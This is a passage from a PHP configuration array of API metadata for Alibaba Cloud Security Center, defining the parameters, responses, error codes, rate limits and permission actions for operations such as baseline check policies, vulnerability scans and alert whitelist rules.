'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Edit common filter conditions for assets', 'summary' => 'Edits the common filter conditions for host assets.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifySearchCondition'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifySearchCondition', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9DFFCF83-4F7B-5E05-B82D-3B619D5****\\"\\n}","type":"json"}]', ], 'ModifySecurityCheckScheduleConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92389', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'DaysOfWeek', 'in' => 'query', 'schema' => ['description' => 'The days on which the automatic configuration check runs. You can specify multiple days. Separate multiple days with commas (,). Valid values:'."\n" ."\n" .'* **1**: Monday'."\n" .'* **2**: Tuesday'."\n" .'* **3**: Wednesday'."\n" .'* **4**: Thursday'."\n" .'* **5**: Friday'."\n" .'* **6**: Saturday'."\n" .'* **7**: Sunday'."\n", 'type' => 'string', 'required' => true, 'example' => '4,5,6', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The time period during which the automatic configuration check starts. Valid values:'."\n" ."\n" .'* **0**: 00:00 to 06:00'."\n" .'* **6**: 06:00 to 12:00'."\n" .'* **12**: 12:00 to 18:00'."\n" .'* **18**: 18:00 to 24:00'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '6', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The time period during which the automatic configuration check ends. Valid values:'."\n" ."\n" .'* **0**: 00:00 to 06:00'."\n" .'* **6**: 06:00 to 12:00'."\n" .'* **12**: 12:00 to 18:00'."\n" .'* **18**: 18:00 to 24:00'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '12', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '02287C0D-8DA9-5766-B51A-A63192BD3E80', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => [ 'substitutions' => ['Sas::2018-12-03::ChangeCheckConfig'], ], 'title' => 'ModifySecurityCheckScheduleConfig', 'summary' => 'Specifies the time when an automatic configuration check on cloud services runs.', 'description' => 'This operation is phased out. You can use the ChangeCheckConfig operation.'."\n", 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifySecurityCheckScheduleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifySecurityCheckScheduleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"02287C0D-8DA9-5766-B51A-A63192BD3E80\\"\\n}","errorExample":""},{"type":"xml","example":"\\n 02287C0D-8DA9-5766-B51A-A63192BD3E80\\n","errorExample":""}]', ], 'ModifySecurityEventMarkMissIndividually' => [ 'summary' => 'Modifies the alert handling rule for alerts that are added to the whitelist by asset.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'InsertMarkMissParam', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The alert handling that you want to add.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{\\"field\\":\\"location\\",\\"operate\\":\\"contains\\",\\"eventType\\":\\"SIL_AI_ALERT\\",\\"eventName\\":\\"login_common_ip\\",\\"fieldValue\\":\\"xx\\",\\"uuids\\":\\"4296ee47-bf19-4fa4-a4a6-6bxxxxxxxxx\\"}]'], ], [ 'name' => 'DeleteMarkMissParam', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The alert handling rule that you want to delete.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{\\"field\\":\\"loginSourceIp\\",\\"operate\\":\\"contains\\",\\"eventType\\":\\"SIL_AI_ALERT\\",\\"eventName\\":\\"login_common_ip\\",\\"fieldValue\\":\\"10.12.XX.XX\\",\\"uuids\\":\\"\\"}]'], ], [ 'name' => 'From', 'in' => 'formData', 'schema' => ['description' => 'The ID of the request source. Set the value to **sas**.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'formData', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. It is automatically obtained by the system.'."\n", 'type' => 'string', 'required' => false, 'example' => '127.0.XX.XX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'BaseResult', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code of the alert event.'."\n" ."\n" .'* **200**: indicates that the alert event is successfully handled.'."\n" .'* Other codes: indicates that the alert event fails to be handled.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'A37B852F-E346-5FF2-82BD-D1F1DXXXXXX', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'TimeCost' => ['description' => 'The time that was consumed to process the request. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifySecurityEventMarkMissIndividually', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifySecurityEventMarkMissIndividually'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifySecurityEventMarkMissIndividually', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"A37B852F-E346-5FF2-82BD-D1F1DXXXXXX\\",\\n \\"HttpStatusCode\\": 200,\\n \\"TimeCost\\": 1\\n}","type":"json"}]', ], 'ModifyServerlessAuthToMachine' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '229832', 'abilityTreeNodes' => ['FEATUREsasA217JR'], ], 'parameters' => [ [ 'name' => 'BindUuidList', 'in' => 'query', 'allowEmptyValue' => false, 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of asset UUIDs to bind.', 'type' => 'array', 'items' => ['description' => 'The UUID of the asset to bind.', 'type' => 'string', 'required' => false, 'example' => '96a005f3-*051a698*', 'title' => ''], 'required' => false, 'maxItems' => 2000, 'title' => '', 'example' => '', ], ], [ 'name' => 'UnBindUuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of asset UUIDs to unbind.', 'type' => 'array', 'items' => ['description' => 'The UUID of the asset to unbind.', 'type' => 'string', 'required' => false, 'example' => '96a005f3-*051a698*', 'title' => ''], 'required' => false, 'maxItems' => 2000, 'title' => '', 'example' => '', ], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The search conditions for assets. This parameter is in JSON format. Pay attention to letter case when specifying this parameter.'."\n" .'> You can search for assets by instance ID, instance name, VPC ID, region, public IP address, and other conditions. Call the [DescribeCriteria](~~DescribeCriteria~~) operation to query supported search conditions.', 'type' => 'string', 'required' => false, 'example' => '[{"name":"vulStatus","value":"YES","logicalExp":"AND"}]', 'title' => ''], ], [ 'name' => 'LogicalExp', 'in' => 'query', 'schema' => ['description' => 'The logical relationship among multiple search conditions. Valid values:'."\n" .'- **OR**: The search conditions are evaluated with a logical OR.'."\n" .'- **AND**: The search conditions are evaluated with a logical AND.', 'type' => 'string', 'required' => false, 'example' => 'OR', 'title' => ''], ], [ 'name' => 'BindAll', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to bind all assets. Default value: **false**. Valid values:'."\n" ."\n" .'- **true**: Bind all assets.'."\n" .'- **false**: Do not bind all assets.', 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'AutoBind', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable automatic binding. Valid values:'."\n" ."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PreBindOrderId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The pre-binding order ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '233016**0482'], ], [ 'name' => 'PreBind', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'Specifies whether to perform a pre-binding operation. Valid values:'."\n" ."\n" .'- **0**: No.'."\n" .'- **1**: Yes.'."\n" ."\n\n" .'> After pre-binding is enabled, the corresponding edition authorization quota is automatically bound to the specified servers after the purchase is completed.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], ], [ 'name' => 'NtmVersion', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The NTM version code for pre-binding.', 'type' => 'string', 'required' => false, 'example' => 'level2'], ], [ 'name' => 'AuthItem', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The instance type. Valid values:'."\n" .'- **SERVERLESS**: Serverless asset.', 'type' => 'string', 'required' => false, 'example' => 'SERVERLESS'], ], [ 'name' => 'BindAssetType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The Asset Type for the operation. Valid values:'."\n" .'- **INSTANCE**: instance.'."\n" .'- **APP**: application.', 'type' => 'string', 'required' => false, 'example' => 'APP'], ], [ 'name' => 'BindAppList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of application IDs to bind.'."\n" ."\n" .'> Retrieve the IDs by calling the [ListMachineApps](~~ListMachineApps~~) operation.', 'type' => 'array', 'items' => ['description' => 'The application ID.', 'type' => 'string', 'required' => false, 'example' => '**7ad7e3a'."\n", 'title' => ''], 'required' => false, 'maxItems' => 2000, 'example' => '', ], ], [ 'name' => 'UnBindAppList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of application IDs to unbind.'."\n" ."\n" .'> Retrieve the IDs by calling the [ListMachineApps](~~ListMachineApps~~) operation.', 'type' => 'array', 'items' => ['description' => 'The application ID to unbind.', 'type' => 'string', 'required' => false, 'example' => '**7ad7e3a', 'title' => ''], 'required' => false, 'maxItems' => 2000, 'example' => '', ], ], [ 'name' => 'AppCriteria', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The application query conditions.', 'type' => 'string', 'required' => false, 'example' => '**7ad7e3a'], ], [ 'name' => 'ResourceDirectoryUid', 'in' => 'query', 'schema' => ['description' => 'The UID of the resource directory.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123456', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'ResultCode' => ['title' => '', 'description' => 'The result code. Valid values:'."\n" .'- **0**: Succeeded.'."\n" .'- **1**: Parameter error.', 'type' => 'integer', 'format' => 'int32', 'example' => '0'], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A47F77A1***8CD37050E', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Manage serverless asset authorization', 'summary' => 'Manages Serverless asset authorization.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyServerlessAuthToMachine'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyServerlessAuthToMachine', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"ResultCode\\": 0\\n },\\n \\"RequestId\\": \\"A47F77A1***8CD37050E\\"\\n}","type":"json"}]', ], 'ModifySoarStrategySubscribe' => [ 'summary' => 'Adds or removes a policy template to or from My Policies in the task center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92391', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The policy ID.'."\n" .'>Call the [DescribeSoarStrategies](~~DescribeSoarStrategies~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '8000', 'title' => ''], ], [ 'name' => 'SubscribeStatus', 'in' => 'query', 'schema' => ['description' => 'The add or remove status. Valid values:'."\n" .'- true: adds the policy template to My Policies'."\n" .'- false: removes the policy template from My Policies.', 'type' => 'boolean', 'required' => true, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => '8BF56229-7FF5-51ED-B958-00B8573E77CD', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Add or remove a policy template to or from my policies', 'description' => 'Only the Enterprise and Ultimate editions of Security Center support this API call. Other editions do not support this call.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifySoarStrategySubscribe'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifySoarStrategySubscribe', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8BF56229-7FF5-51ED-B958-00B8573E77CD\\"\\n}","type":"json"}]', ], 'ModifyStartVulScan' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92392', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Types', 'in' => 'query', 'schema' => ['description' => 'Settings for the types of vulnerabilities to detect by using the one-click scan feature. Valid values:'."\n" .'- **cve**: Linux software vulnerability.'."\n" .'- **sys**: Windows system vulnerability.'."\n" .'- **cms**: Web-CMS vulnerability.'."\n" .'- **app**: Application vulnerability detected by the web scanner.'."\n" .'- **emg**: Emergency vulnerability.'."\n" .'- **image**: Container image vulnerability.'."\n" .'- **sca**: Application vulnerability detected by software constituency parsing.'."\n" .'> If this parameter is left empty, all vulnerability types are detected.', 'type' => 'string', 'required' => false, 'example' => '"cve,sys,cms,app,emg"', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The list of server UUIDs. Separate multiple UUIDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~421726~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '1587bedb-fdb4-48c4-9330-****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique request ID generated by Alibaba Cloud for this request.', 'type' => 'string', 'example' => '4066CAC3-F83A-4729-9995-A5558A61B546', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Trigger one-click vulnerability scan', 'summary' => 'Enables the one-click scan feature on the vulnerability management page of the console.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyStartVulScan'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-aegis:ModifyStartVulScan', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4066CAC3-F83A-4729-9995-A5558A61B546\\"\\n}","type":"json"}]', ], 'ModifyStrategy' => [ 'summary' => 'Modifies a baseline check policy.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.X.X', 'title' => ''], ], [ 'name' => 'CycleDays', 'in' => 'query', 'schema' => ['description' => 'The new interval of the baseline check. Valid values:'."\n" ."\n" .'* **1**: every 2 days'."\n" .'* **3**: every 4 days'."\n" .'* **7**: every 8 days'."\n" .'* **30**: every 31 days'."\n", 'type' => 'string', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The new name of the baseline check policy.'."\n", 'type' => 'string', 'required' => true, 'example' => 'testStrategy', 'title' => ''], ], [ 'name' => 'CycleStartTime', 'in' => 'query', 'schema' => ['description' => 'The new time range during which the baseline check starts. Valid values:'."\n" ."\n" .'* **0**: The baseline check starts within the time range from 00:00 to 06:00.'."\n" .'* **6**: The baseline check starts within the time range from 06:00 to 12:00.'."\n" .'* **12**: The baseline check starts within the time range from 12:00 to 18:00.'."\n" .'* **18**: The baseline check starts within the time range from 18:00 to 24:00.'."\n" ."\n" .'> This parameter is deprecated.'."\n", 'type' => 'string', 'required' => false, 'example' => '18', 'title' => ''], ], [ 'name' => 'RiskSubTypeName', 'in' => 'query', 'schema' => ['description' => 'The subtype of the baselines. You can call the [DescribeRiskType](~~DescribeRiskType~~) operation to query the subtypes of baselines.'."\n", 'type' => 'string', 'required' => true, 'example' => 'hc_exploit_redis', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check policy.'."\n", 'type' => 'string', 'required' => false, 'example' => '245', 'title' => ''], ], [ 'name' => 'RiskCustomParams', 'in' => 'query', 'schema' => ['description' => 'The custom configurations of the baseline. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **typeName**: the name of the baseline.'."\n" ."\n" .'* **checkDetails**: the details of the baseline. The value is in the JSON format.'."\n" ."\n" .' * **checkId**: the ID of the check item.'."\n" ."\n" .' * **rules**: the rule configurations. The value is in the JSON format.'."\n" ."\n" .' * **ruleId**: the ID of the rule.'."\n" ."\n" .' * **paramList**: the list of parameters in the rule. The value is in the JSON format.'."\n" ."\n" .' * **paramName**: the name of the parameter.'."\n" .' * **value**: the value of the parameter.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{"typeName":"hc_centos_6_custom","checkDetails":[{"checkId":4,"rules":[{"ruleId":"pass_min_days_login_defs.must.cus","paramList":[{"paramName":"range_val","value":"7"}]}]}]}]', 'default' => '[]', 'title' => ''], ], [ 'name' => 'CustomType', 'in' => 'query', 'schema' => ['description' => 'The type of the baseline check policy. Valid values:'."\n" ."\n" .'* **custom**: a custom baseline check policy'."\n" .'* **common**: a standard baseline check policy'."\n", 'type' => 'string', 'required' => true, 'example' => 'common', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The method that is used to apply the baseline check policy. Valid values:'."\n" ."\n" .'* **groupId**: asset groups'."\n" .'* **uuid**: assets'."\n", 'type' => 'string', 'required' => true, 'example' => 'groupId', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The time when the baseline check based on the baseline check policy starts. Specify the time in the hh:mm:ss format.'."\n", 'type' => 'string', 'required' => true, 'example' => '00:01:00', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The time when the baseline check based on the baseline check policy ends. Specify the time in the hh:mm:ss format.'."\n", 'type' => 'string', 'required' => true, 'example' => '05:00:00', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The result of modifying the baseline check policy.'."\n", 'type' => 'object', 'properties' => [ 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '8EFA2BD9-00CD-5D69-B6B0-4EE83EAF072E', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Result' => [ 'description' => 'The result returned.'."\n", 'type' => 'object', 'properties' => [ 'StrategyId' => ['description' => 'The ID of the baseline check policy.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '8164239', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"HttpStatusCode\\": 200,\\n \\"RequestId\\": \\"8EFA2BD9-00CD-5D69-B6B0-4EE83EAF072E\\",\\n \\"Success\\": true,\\n \\"Result\\": {\\n \\"StrategyId\\": 8164239\\n }\\n}","errorExample":""},{"type":"xml","example":"\\n 200\\n 8EFA2BD9-00CD-5D69-B6B0-4EE83EAF072E\\n 1\\n true\\n \\n 8164239\\n \\n","errorExample":""}]', 'title' => 'ModifyStrategy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyStrategy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyStrategy', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'BaselineStrategy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:baselinestrategy/{#BaselineStrategyId}'], ], ], ], ], ], 'ModifyStrategyTarget' => [ 'summary' => 'Modifies the servers to which a baseline check policy is applied.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the configuration. Set the value to **hc_strategy**.'."\n", 'type' => 'string', 'required' => true, 'example' => 'hc_strategy', 'title' => ''], ], [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check policy. The ID is returned after the policy is created. The value of this parameter is in the JSON format and contains the following field:'."\n" ."\n" .'* **strategyId**: the ID of the policy'."\n", 'type' => 'string', 'required' => true, 'example' => '{"strategyId":8070645}', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The information about the asset group to which the policy is applied. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **TargetType**: the type of the asset to which the policy is applied. Set the value to **groupId**, which indicates that the policy is applied to an asset group.'."\n" .'* **BindUuidCount**: the number of servers to which the policy is applied.'."\n" .'* **Target**: the ID of the asset group.'."\n", 'type' => 'string', 'required' => true, 'example' => '[{"Target":"9273980","BindUuidCount":5320,"TargetType":"groupId","Flag":"del"},{"Target":"9677606","TargetType":"groupId","Flag":"del"},{"Target":"10121607","BindUuidCount":7,"TargetType":"groupId","Flag":"add"},{"Target":"10670708","BindUuidCount":2,"TargetType":"groupId","Flag":"del"},{"Target":"11246338","BindUuidCount":6,"TargetType":"groupId","Flag":"del"},{"Target":"11291161","BindUuidCount":13,"TargetType":"groupId","Flag":"del"}]', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 